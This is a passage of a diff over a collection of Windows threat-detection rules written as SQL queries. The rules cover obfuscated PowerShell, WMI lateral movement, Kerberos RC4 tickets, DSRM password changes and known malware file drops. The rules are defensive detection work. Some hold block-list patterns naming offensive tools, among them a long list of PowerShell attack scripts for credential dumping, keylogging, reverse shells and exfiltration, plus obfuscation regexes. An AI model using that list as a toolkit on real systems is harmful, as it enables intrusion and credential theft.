"Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": 
"win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated 
powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + 
"Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "status": "test", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "attack.lateral_movement", + "attack.t1021.002" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" - }, - { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND 
